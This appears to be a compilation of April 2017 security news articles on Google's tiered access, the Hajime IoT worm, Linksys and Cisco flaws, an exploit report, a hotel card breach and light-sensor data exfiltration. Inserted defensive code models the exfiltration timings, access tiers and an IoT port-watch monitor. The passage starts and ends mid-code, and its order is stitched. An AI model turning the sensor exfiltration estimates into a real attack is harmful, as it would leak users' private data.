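# counted here as 6 bits, a QR code or image as one bit per pixel, a URL as
# one bit; with those assumptions the article's timings follow.
MS_PER_BIT_POC = 500


def exfil_seconds(n_bits: int, ms_per_bit: int = MS_PER_BIT_POC) -> float:
    return n_bits * ms_per_bit / 1000


@dataclass
class SensorPolicy:
    """Assumed defensive wrapper a browser could place in front of the raw
    sensor (not the W3C API): rate-limit and round every reading."""
    min_interval_ms: int
    step_lux: float
    _last_ms: Optional[int] = field(default=None, init=False)

    def deliver(self, now_ms: int, raw_lux: float) -> Optional[float]:
        if self._last_ms is not None and now_ms - self._last_ms < self.min_interval_ms:
            return None                           # throttled: no new sample
        self._last_ms = now_ms
        return math.floor(raw_lux / self.step_lux) * self.step_lux


def screen_bit_leaks(policy: SensorPolicy, ambient_lux: float, screen_delta_lux: float) -> bool:
    """Can a page still tell a black screen from a white one after the policy?"""
    black = SensorPolicy(policy.min_interval_ms, policy.step_lux).deliver(0, ambient_lux)
    white = SensorPolicy(policy.min_interval_ms, policy.step_lux).deliver(0, ambient_lux + screen_delta_lux)
    return black != white


def leak_fraction(step_lux: int, screen_delta_lux: int) -> float:
    """Fraction of ambient levels (swept in tenths of a lux across one rounding
    step) for which the screen's contribution still crosses a rounding boundary.
    Rounding never gets this to zero; it only shrinks it to delta/step."""
    leaks = 0
    samples = step_lux * 10
    for tenths in range(samples):
        if screen_bit_leaks(SensorPolicy(0, step_lux), tenths / 10, screen_delta_lux):
            leaks += 1
    return leaks / samples


def attack_seconds_under_policy(n_bits: int, policy: SensorPolicy) -> float:
    """Throttling caps the channel at one reading per interval, so each bit
    takes the PoC's 500 ms or the policy interval, whichever is slower."""
    return exfil_seconds(n_bits, max(MS_PER_BIT_POC, policy.min_interval_ms))


if __name__ == "__main__":
    print("PoC: 8-char password", exfil_seconds(8 * 6), "s; 64x64 image", exfil_seconds(64 * 64), "s")
    print("leak fraction, 5 lux screen delta, 50 lux rounding:", leak_fraction(50, 5))
    print("20x20 QR with one reading per 5 s:", attack_seconds_under_policy(400, SensorPolicy(5000, 1)), "s")
```

With a 5 lux screen contribution and 50 lux rounding, only about one ambient level in ten still leaks, and a 5-second interval stretches the 20x20 QR code from 200 seconds to 2,000; neither change alone is a fix, which is why a permission prompt remains the decisive control.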


This is How Google Secures Devices for Its 61,000 Employees

20.4.2017 securityweek Safety
Google Details Its Implementation of Tiered Access to Secure Devices for More Than 61,000 Employees

The easiest solution to access control is binary: network access is either granted or denied. It's a blunt tool that doesn't suit the modern business culture of maximizing user productivity and creativity. Granularity in access control, allowing users to access what is needed when it is needed, is a more suitable model for the modern business.

Google chose the Tiered Access model for its own workforce of some 61,000 employees. In a new whitepaper (PDF) and blog published today, it explains that it has "a culture of innovation that requires the freedom and flexibility to connect many different devices to many different assets and services."

This is an attitude that will resonate with many modern businesses.

"Tiered access was implemented in order to provide an access model appropriate for [Google's] very heterogeneous environment. It helps ensure the security of corporate resources while allowing users to make informed trade-offs around access and security controls." Many organizations offer their staff flexibility in the devices they use -- especially where a BYOD policy is in place.

Tiered access is achieved by first analyzing the client base devices and data sources; analyzing the services that are to be accessed; and choosing a gateway/access technology that can evaluate policies and make access decisions between the client base and service.

How Google Secures Devices on its Network

Google uses its own internally developed tools to collect the device data, but suggests that other companies could use security reporting systems (logs), patch management systems, asset management systems and centralized management dashboards. The purpose is to gather device attributes and device state into a central repository.

The device attributes allow the definition of device baselines, based on things like vendor and operating system, and built-in security features. The device state, continuously monitored, highlights deviations from the device baseline. These two attributes can be used to associate devices to the different tiers.

"For example," explains Google, "an Android device at Google may access more sensitive data in higher trust tiers if it is a 'Fully Managed' device, meaning it provides full device control and access to detailed system and network logs." A lower trust tier is made accessible to BYOD devices with a work profile.

Between the device and the service sits an Access Control Engine that provides a service-level authorization to enterprise applications on a per-request basis. It queries the central repository in order to make policy decisions on what access is allowable -- it is where policy is defined and managed by security.

The 'tiers' in tiered access are levels of sensitivity applied to the organization's different services. Google uses just four tiers: untrusted; basic access; privileged access; and highly privileged access. It chose four tiers as a compromise between too many (making the system over-complex), and too few (which effectively recreates the binary access that the tiered approach seeks to improve).
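The pieces described above (a central device repository, baseline attributes plus monitored state, a service catalogue classified into four tiers, and an access control engine deciding per request) fit together as in the following added example. It is not Google's code or the whitepaper's policy; the tier names are the article's, while the demotion rules, device fields, services and inventory records are assumptions constructed for illustration. Unclassified services are denied by default, which is the reason the article gives for making service on-boarding a scaling concern.

```python
from dataclasses import dataclass
from typing import Dict, Optional

# The four tiers the article names, least to most trusted.
TIERS = ["untrusted", "basic", "privileged", "highly_privileged"]


@dataclass
class Device:
    """Inventory record: static attributes plus continuously monitored state."""
    device_id: str
    platform: str               # attribute: "android", "macos", ...
    management: str             # attribute: "fully_managed", "work_profile" (BYOD) or "unmanaged"
    disk_encrypted: bool        # attribute from the baseline
    patch_lag_days: int         # state: days behind the baseline patch level
    agent_healthy: bool         # state: endpoint agent reporting normally


def assign_tier(d: Device) -> str:
    """Map a device's attributes and state to the highest tier it may use.
    Tier names are the article's; the demotion rules are assumed for the example."""
    if d.management == "fully_managed":
        tier = TIERS.index("highly_privileged")   # full device control + detailed logs
    elif d.management == "work_profile":
        tier = TIERS.index("basic")               # BYOD with a work profile
    else:
        return "untrusted"
    if not d.disk_encrypted:
        tier = min(tier, TIERS.index("basic"))
    if d.patch_lag_days > 30:                     # deviation from the baseline
        tier -= 1
    if not d.agent_healthy:                       # state can no longer be verified
        tier -= 1
    return TIERS[max(tier, 0)]


# Service catalogue: each service's owner classifies it into a required tier.
SERVICE_TIER: Dict[str, str] = {
    "cafeteria-menu": "untrusted",
    "wiki": "basic",
    "source-repo": "privileged",
    "prod-admin": "highly_privileged",
}


def authorize(inventory: Dict[str, Device], device_id: str, service: str) -> dict:
    """Per-request decision of the access control engine: look the device up in
    the central repository, compute its tier and compare it with the service's."""
    required: Optional[str] = SERVICE_TIER.get(service)
    if required is None:
        return {"allowed": False, "reason": "service not onboarded/classified"}
    device = inventory.get(device_id)
    if device is None:
        return {"allowed": False, "reason": "device unknown to inventory"}
    tier = assign_tier(device)
    allowed = TIERS.index(tier) >= TIERS.index(required)
    return {"allowed": allowed, "device_tier": tier, "required_tier": required}


# Constructed inventory.
INVENTORY = {d.device_id: d for d in [
    Device("pixel-1", "android", "fully_managed", True, 3, True),
    Device("pixel-2", "android", "work_profile", True, 3, True),
    Device("laptop-7", "macos", "fully_managed", True, 45, False),
    Device("guest-x", "windows", "unmanaged", False, 0, False),
]}

if __name__ == "__main__":
    for dev, svc in [("pixel-1", "prod-admin"), ("pixel-2", "source-repo"),
                     ("laptop-7", "source-repo"), ("guest-x", "wiki"), ("pixel-1", "new-dashboard")]:
        print(dev, svc, authorize(INVENTORY, dev, svc))
```

Note that `laptop-7` is fully managed yet lands in the basic tier: its patch lag and broken agent are state deviations, which is the distinction the article draws between attributes (what the device is) and state (what it is doing now).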

Tiered access

While this is the current state of Google's tiered access solution to its on-site and mobile workforces, development is ongoing. It has four areas currently under consideration. The first is to increase the granularity of the system by improving "the precision of access decisions while balancing the need for users to understand security requirements."

The second is to add user attributes to the device attributes by considering "the user’s observed behavior and how that compares to normal activity as analyzed with machine learning." This will allow access based on both the device and current user behavior.

The third is to drive self-selection of trust tiers by encouraging people to voluntarily move across trust tiers in real-time; for example, to be at 'fully trusted' for the next two hours only.

Finally, Google hopes to improve the service on-boarding process. Since services are added or updated all the time, they all need to be classified in terms of risk and sensitivity. "To scale," suggests Google, "service owners must be empowered to make the right tier assignments themselves, which is a process that is constantly improving."

Google hopes that by sharing its own experiences in developing and deploying tiered access, IT and security admins will feel empowered to develop a flexible and powerful access control system that better suits today's business. Its Tiered Access project goes hand-in-hand with the larger BeyondCorp project that challenges traditional security assumptions that private or 'internal' IP addresses represented a 'more trusted' device than those coming from the internet. Part of BeyondCorp is discussed in the Google Infrastructure Security Design Overview.


White Hat Hacker Created Mysterious IoT Worm, Symantec Says

20.4.2017 securityweek IoT
Hajime IoT Worm Appears to be Work of White Hat Hacker

An Internet of Things (IoT) worm that targets the same devices as the infamous Mirai botnet appears to be the work of a white hat hacker, Symantec researchers say.

Dubbed Hajime, the worm was initially discovered in October, just weeks after Mirai’s code emerged online, and Rapidity Networks researchers estimated at the time it had infected between 130,000 and 185,000 devices. The malware was using the same username and password combinations as Mirai, and was focused on compromising the very same insecure IoT devices.

At the time, however, Rapidity Networks suggested that the malware could be only a research project, as it had no other components than the spread module. Basically, while Mirai remains focused on ensnaring devices to abuse them in distributed denial of service (DDoS) attacks, Hajime doesn't appear to have a malicious component.

Six months later, nothing has changed in this regard, and the worm continues to pack only the spread module, with its actual purpose still a mystery, Symantec says. However, the security researchers do note that the malware installs a backdoor on the compromised devices, which could be used for nefarious purposes.

At the moment the malware only fetches a statement from its controller and displays it on the terminal approximately every 10 minutes, researchers say. The statement claims that a white hat is behind the code, and that they are “securing some systems.”

The operator has the option to open a shell script to any infected machine in the network at any time, and has designed Hajime to accept only messages signed by a hardcoded key. Thus, it’s clear that the message Hajime displays on the terminal comes from the author.

Hajime is a peer-to-peer botnet, meaning that there is no single command and control (C&C) address that it has to connect to when receiving commands. Instead, its operator can push commands to the network and wait for them to propagate to all peers over time.

The malware appears more advanced compared to Mirai, and researchers discovered that it takes multiple steps in an attempt to hide its presence on the system. Courtesy of Hajime’s modular design, the operator can add new capabilities to it on the fly. According to Symantec, the author has invested a “fair amount of development time” in this creation.

“However, there is a question around trusting that the author is a true white hat and is only trying to secure these systems, as they are still installing their own backdoor on the system. The modular design of Hajime also means if the author’s intentions change they could potentially turn the infected devices into a massive botnet,” the security firm explained.

On the other hand, once it has infected a device, the malware attempts to improve security by blocking access to ports 23, 7547, 5555, and 5358. These ports are already known to be hosting services that are exploitable by many threats, including Mirai.

Hajime’s behavior is similar to that of Wifatch, also known as the “vigilante malware,” and isn’t viewed as an effective approach to securing IoT devices. The effects of white worms are only temporary, because the changes are made only in RAM and do not persist across reboots.

“Once the device is rebooted it goes back to its unsecured state, complete with default passwords and a Telnet open to the world. To have a lasting effect, the firmware would need to be updated. It is extremely difficult to update the firmware on a large scale because the process is unique to each device and in some cases is not possible without physical access,” Symantec said.

This also means that there’s a constant battle between Hajime, Mirai and other IoT malware out there to take over exposed devices. This battle is a cycle that repeats after each device reboot. Only newer, more secure firmware can end it, researchers say.

As it turns out, the worm’s author is keeping track of reports on the malware, and adopted the Hajime name after Rapidity Networks gave the threat that name last year, to keep it in line with Mirai’s Japanese naming (Mirai means “future” in Japanese, Hajime means “beginning”). Further, it appears that the author also addressed some bugs in the code after security researchers pointed them out in their October report.

According to Symantec, while it’s difficult to estimate the size of the network, “modest estimates put it in the tens of thousands.” The researchers also reveal that most of the infected machines are located in Brazil (19%), followed by Iran (17%), Thailand (11%), Russian Federation (11%), Turkey (8%), Vietnam (8%), Argentina (7%), Australia (7%), China (6%), and Taiwan (6%).

“What is needed to protect organizations from the perils of vulnerable IoT devices is a least privilege approach. IoT devices should be hard coded to only communicate with the local server or the manufacturer’s server across the Internet. Organizations should define policies aligned to the IP addresses and layer 4 ports these devices must use to operate and deny all others. Network Traffic Analysis technologies can be used to monitor traffic to and from IoT devices and alert if they send or receive any traffic that falls outside the least privilege policy,” Bob Noel, Director of Strategic Relationships and Marketing for Plixer International, told SecurityWeek in an emailed statement.
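The least-privilege policy Noel describes, combined with the four ports the article says Hajime closes, can be turned into a small flow monitor. The following is an added example, not Plixer's or Symantec's tooling: the flow-log format, the device and server addresses, and the allow-list are constructed, and the monitor raises an alert both when an IoT device talks to anything outside its allow-list (the outbound Telnet attempt below is what a device scanning for new victims looks like from the network) and when anything connects inbound to one of the commonly abused ports.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Ports the article says Hajime closes on infected devices because they host
# services commonly abused by IoT malware (including Mirai).
WATCHED_INBOUND_PORTS: Set[int] = {23, 7547, 5555, 5358}

# Least-privilege policy per IoT device: the only (destination, protocol, port)
# triples it needs to operate. Constructed addresses.
Endpoint = Tuple[str, str, int]
POLICY: Dict[str, Set[Endpoint]] = {
    "10.0.20.11": {                      # an IP camera, for the example
        ("10.0.10.5", "tcp", 443),       # local video server
        ("203.0.113.10", "tcp", 443),    # manufacturer's update server
        ("10.0.10.2", "udp", 53),        # local resolver
    },
}


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int


def parse_flow(line: str) -> Flow:
    """Constructed flow-log format: '<ts> <src>:<sport> -> <dst>:<dport> <proto>'."""
    ts, src, arrow, dst, proto = line.split()
    if arrow != "->":
        raise ValueError(f"unexpected flow line: {line!r}")
    src_ip, _ = src.rsplit(":", 1)
    dst_ip, dport = dst.rsplit(":", 1)
    return Flow(ts, src_ip, dst_ip, proto, int(dport))


def evaluate(lines: List[str], policy: Dict[str, Set[Endpoint]]) -> List[dict]:
    """Return one alert per flow that violates the policy or probes a watched port."""
    alerts: List[dict] = []
    for line in lines:
        f = parse_flow(line)
        if f.src in policy and (f.dst, f.proto, f.dport) not in policy[f.src]:
            alerts.append({"ts": f.ts, "device": f.src, "flow": line,
                           "reason": "outbound traffic outside least-privilege policy"})
        if f.dst in policy and f.dport in WATCHED_INBOUND_PORTS:
            alerts.append({"ts": f.ts, "device": f.dst, "flow": line,
                           "reason": f"inbound connection to commonly abused port {f.dport}"})
    return alerts


# Constructed flow records: two legitimate flows, one inbound Telnet probe,
# one outbound Telnet attempt (the device trying to reach another host), one update check.
SAMPLE_LOG = [
    "2017-04-20T10:00:01Z 10.0.20.11:50122 -> 10.0.10.5:443 tcp",
    "2017-04-20T10:00:02Z 10.0.20.11:5353 -> 10.0.10.2:53 udp",
    "2017-04-20T10:00:05Z 192.0.2.44:41000 -> 10.0.20.11:23 tcp",
    "2017-04-20T10:00:09Z 10.0.20.11:50123 -> 198.51.100.7:23 tcp",
    "2017-04-20T10:00:12Z 10.0.20.11:50124 -> 203.0.113.10:443 tcp",
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_LOG, POLICY):
        print(alert["ts"], alert["device"], alert["reason"])
```

The inbound alert fires regardless of whether the device has been "secured" by a white worm, which matters because, as the article notes, Hajime's port blocking disappears on reboot; the outbound alert is the one that catches a device that has already been compromised and is spreading.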


Bose Wireless Headphones Spy on Users, Lawsuit Claims

20.4.2017 securityweek CyberSpy
Bose Headphones Join the Internet of Spying Things

Bose wireless headphones, which sell for up to $350, collect the listening habits of users via an associated app. This data is transmitted to Bose, which then passes it to a marketing company, a lawsuit alleges. One aggrieved user brought the class action suit against Bose, alleging infringement of the federal Wiretap Act and numerous state laws.

Illinois case 17-cv-2928, brought by Bose customer Kyle Zak "on behalf of others similarly situated" claims the case is worth more than $5 million; but without specifying damages, seeks a jury trial.

The lawsuit states that Bose introduced a mobile phone app, Bose Connect, in 2016 to remotely control and manage the headphones via a Bluetooth connection. Bose advertised this with the claim: "Bose Connect app unlocks current and future headphone features. Download now."

Unknown to the customer, states the lawsuit, Bose "designed Bose Connect to (i) collect and record the titles of the music and audio files its customers choose to play through their Bose wireless products and (ii) transmit such data along with other personal identifiers to third-parties -- including a data miner -- without its customers' knowledge or consent."

Since Bose also asks for the name, email address and the product's serial number, it is able to build detailed listening habits of known individuals.

These listening habits can help produce a personal profile of the customer. The lawsuit claims that "numerous scientific studies show that musical preferences reflect explicit characteristics such as age, personality, and values, and can likely even be used to identify people with autism spectrum conditions." Audio podcasts can be even more revealing, potentially identifying the race, religion, sexual orientation and health issues of the listener.

Such privacy issues usually revolve around the concept of informed consent. Zak claims that he would not have purchased the headphones had he been aware of the data collection. The privacy policy with the app, however, makes it clear that Bose collects data, tracks the user and shares that data. "We share the information that we collect with a variety of third parties. Additionally, other third parties collect information directly through the app."

This clear statement would be a red flag to any privacy-conscious user. However, by the time it is seen, the user will almost certainly have already spent up to $350 on the headphones themselves. Although they can function without the app, it is the app that maximizes their quality.

Zak is represented by Christopher Dore, a partner at Edelson PC. According to Reuters, Edelson specializes in suing technology companies over alleged privacy violations. Dore told Reuters that customers do not see the Bose app's user service and privacy agreements when signing up, and the privacy agreement says nothing about data collection.

This last comment is either wrong, or the app's privacy policy has since been updated.

In February 2017, Smart TV manufacturer Vizio agreed to pay an FTC settlement of $2.2 million over allegations that it collected information on users' viewing habits without their knowledge. Although the settlement did not include an admission of 'guilt', Vizio will now prominently display its wish to collect data, and ensure it obtains affirmative express consent.

Late last year, a team of researchers demonstrated how a piece of malware could spy on users by silently turning their headphones into a microphone that can capture audio data from a significant distance. Early this year, German regulators banned an internet-connected doll called "My Friend Cayla" after warning that it was a de facto "spying device".


Experts Find 10 Flaws in Linksys Smart Wi-Fi Routers

20.4.2017 securityweek Vulnerebility

Researchers at IOActive have analyzed Linksys routers and discovered a total of 10 vulnerabilities. Patches have yet to be released, but the vendor has provided some mitigation advice.

The research has focused on Linksys routers that support the Smart Wi-Fi feature, which enables users to manage and control their home wireless network remotely from a mobile application. According to Linksys, the vulnerabilities found by IOActive affect 25 EA and WRT series routers.

IOActive will not disclose any specific information until Linksys releases firmware updates and users have had a chance to patch their devices. However, experts said the vulnerabilities they have identified can be exploited to cause a denial-of-service (DoS) condition, obtain potentially sensitive data, and even to plant backdoors.

Two of the flaws can be used for DoS attacks. Unauthenticated hackers can cause the router to become unresponsive or reboot by sending specially crafted requests to a specific API. Exploitation of these flaws disrupts network connections and prevents device administrators from accessing the web interface.

Authentication bypass vulnerabilities allow attackers to access certain CGI scripts that provide access to various types of information, including firmware and Linux kernel versions, running processes, connected USB devices, and the WPS PIN. Attackers can also collect data on firewall configurations, FTP settings, and SMB server settings.

IOActive also warned that attackers who do manage to log in to the router can inject and execute commands on the device’s operating system with root privileges. This allows them to create backdoor accounts that are not visible to legitimate administrators.

However, researchers pointed out that they did not manage to find an authentication bypass that can allow an attacker to exploit this vulnerability – the authentication bypass they did find only provides access to some CGI scripts, not the API that enables these more damaging attacks.

A Shodan search conducted by IOActive revealed 7,000 vulnerable devices that can be accessed directly from the Internet. Nearly 70 percent of them were located in the United States, followed by Canada, Hong Kong, Chile, Netherlands, Venezuela, Argentina, Russia, Sweden, Norway, China, India, UK and Australia.

While researchers have not found a way to bypass authentication in order to exploit the command injection vulnerability, they did determine that 11 percent of the 7,000 exposed devices had been using default credentials.

IOActive reported the vulnerabilities to Linksys in mid-January. The vendor is working on releasing firmware updates for affected devices and, in the meantime, it has provided some mitigation advice. The company recommends temporarily disabling the Guest Network feature, and changing the default admin password.

This research was conducted just a few months after IOActive reported finding multiple vulnerabilities in BHU Wi-Fi uRouter, a device manufactured and sold in China.


Cisco Fixes Serious Flaws in Security, Other Products

20.4.2017 securityweek Vulnerebility
Cisco has released software updates for its Firepower, IOS, Adaptive Security Appliance (ASA) and Unified Communications Manager (Unified CM) products to address high severity denial-of-service (DoS) vulnerabilities.

One of the flaws, identified as CVE-2016-6368, can affect several products running Cisco Firepower System Software, including ASA, Advanced Malware Protection (AMP), Firepower, Sourcefire 3D and Industrial Security appliances. An unauthenticated attacker can exploit the vulnerability remotely to cause a DoS condition.

Related: Cisco Launches New Firepower Firewalls

A DoS vulnerability (CVE-2017-3808) that can be exploited by a remote, unauthenticated attacker has also been found in Cisco Unified CM, namely in the Session Initiation Protocol (SIP) UDP throttling process.

Several high severity DoS flaws have also been discovered in the EnergyWise module of Cisco’s IOS and IOS XE software. EnergyWise is designed for monitoring and managing the power usage of devices in a domain, including networking devices and Power over Ethernet (PoE) endpoints.

Cisco has also published four advisories describing remotely exploitable weaknesses in its ASA software. The security holes affect components such as the IKEv1 XAUTH code, the SSL/TLS code, IPsec code and DNS code.

Two of the vulnerabilities can be exploited by an unauthenticated attacker, while the other two require authentication.

Most of these flaws have been discovered by Cisco itself and there is no evidence that any of them have been exploited for malicious purposes.

Cisco is one of several tech companies whose products have been targeted by exploits described recently by WikiLeaks as part of a dump called “Vault 7.” The networking giant has discovered a zero-day vulnerability affecting many of its switches.

Patches have yet to be made available for the flaw and Cisco warned customers last week that a researcher has released a proof-of-concept (PoC) exploit.


Exploits: how great is the threat?
20.4.2017 Kaspersky Exploit

Full Report

How serious, really, is the danger presented by exploits? The recent leak of an exploit toolset allegedly used by the infamous Equation Group suggests it’s time to revisit that question. Several zero-days, as well as a bunch of merely ‘severe’ exploits apparently used in-the-wild were disclosed, and it is not yet clear whether this represents the full toolset or whether there’s more to come, related to either Equation or another targeted threat actor.

Of course, Equation Group is not the first, and is certainly not the only sophisticated targeted attacker to use stealthy, often zero-day exploits in its activity.

Today we are publishing an overview of the exploit threat landscape. Using our own telemetry data and intelligence reports as well as publicly available information, we’ve looked at the top vulnerabilities and applications exploited by attackers.

We have examined them from two equally important perspectives. The first part of the report summarises the top exploits targeting all users in 2015-2016, and the most vulnerable applications. The second part considers the vulnerabilities exploited between 2010 and 2016 by significant targeted threat actors reported on by Kaspersky Lab: that’s 35 actors and campaigns in total.

Key findings on exploits targeting all users in 2015-2016:

In 2016 the number of attacks with exploits increased 24.54%, to 702,026,084 attempts to launch an exploit.
4,347,966 users were attacked with exploits in 2016 which is 20.85% less than in the previous year.
The number of corporate users who encountered an exploit at least once increased 28.35% to reach 690,557, or 15.76% of the total number of users attacked with exploits.
Browsers, Windows, Android and Microsoft Office were the applications exploited most often – 69.8% of users encountered an exploit for one of these applications at least once in 2016.
In 2016, more than 297,000 users worldwide were attacked by unknown exploits (zero-day and heavily obfuscated known exploits).
2015-2016 witnessed a number of positive developments in the exploit threat landscape. For example, two very dangerous and effective exploit kits – Angler (XXX) and Neutrino – left the underground market, depriving the cybercriminal community of a very comprehensive set of tools created to hack computers remotely.

A number of bug bounty initiatives aimed at highlighting dangerous security issues were launched or extended. Together with the ever-increasing efforts of software vendors to fix new vulnerabilities, this significantly increased the cost to cybercriminals of developing new exploits. A clear victory for the infosec community that has resulted in a drop of just over 20% in the number of private users attacked with exploits: from 5.4 million in 2015 to 4.3 million in 2016.

However, alongside this welcome decline, we’ve registered an increase in the number of corporate users targeted by attacks involving exploits. In 2016, the number of attacks rose by 28.35% to reach more than 690,000, or 15.76% of the total number of users attacked with exploits. In the same year, more than 297,000 users worldwide were attacked by unknown exploits. These attacks were blocked by our Automatic Exploit Prevention technology, created to detect this type of exploit.

Key findings on exploits used by targeted attackers 2010-2016:

Overall, targeted attackers and campaigns reported on by Kaspersky Lab in the years 2010 to 2016 appear to have held, used and re-used more than 80 vulnerabilities. Around two-thirds of the vulnerabilities tracked were used by more than one threat actor.
Sofacy, also known as APT28 and Fancy Bear, seems to have made use of a staggering 25 vulnerabilities, including at least six, if not more, zero-days. The Equation Group is not far behind, with approximately 17 vulnerabilities in its arsenal, of which at least eight were zero-days, according to public data and Kaspersky Lab’s own intelligence.
Russian-speaking targeted attack actors take three of the top four places in terms of vulnerability use (the exception being Equation Group in second place), with other English- and Chinese-speaking threat actors further down the list.
Once made public, a vulnerability can become even more dangerous: grabbed and repurposed by big threat actors within hours.
Targeted attackers often exploit the same vulnerabilities as general attackers – there are notable similarities between the list of top vulnerabilities used by targeted threat actors in 2010-2016, and those used in all attacks in 2015-2016.
When looking more closely at the applications used by targeted threat actors to mount exploit-based attacks, we weren’t surprised to discover that Windows, Flash and Office top the list.

Exploits: how great is the threat?

Applications and operating systems most often exploited by targeted attack groups.

Moreover, the recent leak of multiple exploits allegedly belonging to the Equation cyberespionage group highlighted another known but often overlooked truth: the life of an exploit doesn’t end with the release of a security patch designed to fix the vulnerability being exploited.

Our research suggests that threat actors are still actively and successfully exploiting vulnerabilities patched almost a decade ago – as can be seen in the chart below:

Exploits: how great is the threat?

Everyone loves an exploit

Exploits are an effective delivery tool for malicious payloads and this means they are in high demand among malicious users, whether they are cybercriminal groups, or targeted cyberespionage and cybersabotage actors.

To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.

Conclusion and Advice

The conclusion is a simple one: even if a malicious user doesn’t have access to expensive zero-days, the chances are high that they’d succeed with exploits for old vulnerabilities, because there are many systems and devices out there that have not yet been updated.

Even though developers of popular software invest huge resources into finding and eliminating bugs in their products and exploit mitigation techniques, for at least the foreseeable future the challenge of vulnerabilities will remain.

In order to protect your personal or business data from attacks via software exploits, Kaspersky Lab experts advise the following:

Keep the software installed on your PC up to date, and enable the auto-update feature if it is available.
Wherever possible, choose a software vendor which demonstrates a responsible approach to a vulnerability problem. Check if the software vendor has its own bug bounty program.
If you are managing a network of PCs, use patch management solutions that allow for the centralized updating of software on all endpoints under your control.
Conduct regular security assessments of the organization’s IT infrastructure.
Educate your personnel on social engineering as this method is often used to make a victim open a document or a link infected with an exploit.
Use security solutions equipped with specific exploit prevention mechanisms, or at least behavior-based detection technologies.
Give preference to vendors which implement a multilayered approach to protection against cyberthreats, including exploits.


Hackers Steal Payment Card Data From Over 1,150 InterContinental Hotels
20.4.2017 thehackernews CyberCrime
InterContinental Hotels Group (IHG) is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on payment card systems at 1,174 franchise hotels in the United States.
It's the second data breach that U.K.-based IHG, which owns Holiday Inn and Crowne Plaza, has disclosed this year. The multinational hotel conglomerate confirmed a credit card breach in February which affected 12 of its hotels and restaurants.
What happened?
IHG identified malware accessing payment data from cards used at front desk systems between September 29 and December 29, 2016, but the malware was only erased after the investigation was completed in March 2017.
"Many IHG-branded locations are independently owned and operated franchises and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations," read the notice published to IHG’s site on Friday.
What type of information?
The malware obtained credit card data, such as cardholders' names, credit card numbers, expiration dates and internal verification codes, from the card's magnetic stripe, although the company said there is no evidence of any unauthorized access to payment card data after late December.
However, the company cannot confirm that the malware was removed until February and March 2017, when it began its investigation into the data breach.
How many victims?
The total number of affected customers is not revealed by the company, although customers can use a lookup tool IHG has posted on its website to search for hotels by city and state.
The company says this most recent breach mostly affects guests of U.S.-based hotels who stayed between September 29 and December 29, 2016. The 1,174 hotels breached in the US include 163 in Texas, 64 in California, 61 in Florida, 53 in Indiana, 50 in Ohio, 45 in New York, 42 in Michigan and 39 in Illinois, among others.
The only non-U.S. hotel hit by the malware was a Holiday Inn Express in San Juan, Puerto Rico.
Who is not affected by the breach?
Those franchise hotel locations that had implemented IHG's Secure Payment Solution (SPS) – a point-to-point encryption payment acceptance solution – before 29th September 2016 were not affected by this data breach.
IHG is advising all franchise hotels to implement SPS in order to protect themselves from such malware attacks, though the company also said that many more properties implemented SPS after September 29, 2016, which ended the malware’s ability to find payment card data.
What is the IHG doing?
IHG has already notified law enforcement of the recent data breach.
Moreover, on behalf of franchisees, the company has been working closely with the payment card networks and the cyber security firm to confirm that the malware has been removed and evaluate ways for franchisees to enhance security measures.
What should IHG customers do?
Users are advised to review their payment card statements carefully and to report any unauthorized bank transactions.
You should also consider requesting a replacement card if you visited any of the affected properties during the three-month period when the breach was active.
"The phone number to call is usually on the back of your payment card. Please see the section that follows this notice for additional steps you may take," the company says.
IHG became the latest hotel chain to report a potential customer data breach in the past few years, following breaches at Hyatt, Hilton, Mandarin Oriental, Starwood, White Lodging and the Trump Collection, all of which acknowledged finding malware in their payment systems.


Exfiltrating data from laptop and smartphones via ambient light sensors
20.4.2017 securityaffairs Mobil

A security researcher presented a method to exfiltrate sensitive data from a laptop or a smartphone through built-in ambient light sensors.
The security expert Lukasz Olejnik discovered that it is possible to steal sensitive data by exploiting the ambient light sensors built into many smartphones and laptops.

Ambient light sensors are installed on electronic devices to automatically adjust the screen brightness, but Olejnik is warning that the World Wide Web Consortium (W3C) is deciding “whether to allow websites access the light sensor without requiring the user’s permission.”

In this way, an attacker can analyze variations in brightness through the ambient light sensor and steal sensitive data, such as a QR code displayed on a web page as part of an authentication mechanism.

“How exactly can ambient light readings allow extracting private data? Our attack is based on two observations:

The color of the user’s screen can carry useful information which websites are prevented from directly accessing for security reasons.
Light sensor readings allow an attacker to distinguish between different screen colors.” wrote Olejnik in a blog post.


As an example, Olejnik reminds us that many sites change the color of links once a user has visited them; the expert then used the ambient light sensor to detect these changes and access the user’s browsing history.

“For privacy reasons, browsers lie to developers about the colors of links displayed on a page; otherwise a malicious developer could apply :visited styles and detect which websites are present in the user’s history.” continues Olejnik.

The expert highlighted that this kind of attack is very slow: it took 48 seconds to detect a 16-character text string and three minutes and twenty seconds to recognize a QR code.

“In principle, browser sensors can deliver a 60 Hz readout rate. However, this does not mean that we can actually extract 60 bits per second – that’s because the ultimate detection limit is tied to the rate at which a change in screen brightness can be detected by the sensor.” explained Olejnik.

In their tests, the expert and his team measured a screen-brightness-to-readout latency of 200-300 ms, and for a fully reliable exploit it’s more realistic to assume one bit per 500 ms.

Below are examples of detection times obtainable at the above rate:

Plain text string of 8 characters: 24 seconds (assuming 6 bits per character for an alphanumeric string rendered in a known font)
Plain text string of 16 characters: 48 seconds
20×20 QR code: 3 minutes 20 seconds
Detecting 1000 popular URLs in the history: 8 minutes 20 seconds
64×64 pixel image: 34 minutes 8 second
The good news is that in some cases the attack is not feasible, because users would not keep a QR code on the screen for so long.

Olejnik also proposes a countermeasure to mitigate the attack: limiting the frequency of ambient light sensor readings exposed through the API and quantizing their output. In this way, the countermeasure prevents abuse without affecting the normal operation of the sensors.

“The current proposal argues that the following protections are sufficient:

Limit the frequency of sensor readings (to much less than 60Hz)
Limit the precision of sensor output (quantize the result)” concluded Olejnik.
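As an added example (not code from Olejnik’s post or the W3C proposal), the two protections above written as a wrapper around a raw sensor read, together with the one-bit-per-500 ms detection-time estimate the post uses; a constructed sample shows a page-driven dark/light flip collapsing into a single quantized level. The raw read function and the clock are assumed, injected parameters.

```javascript
// Added example: applies the two mitigations in the proposal (rate limit and
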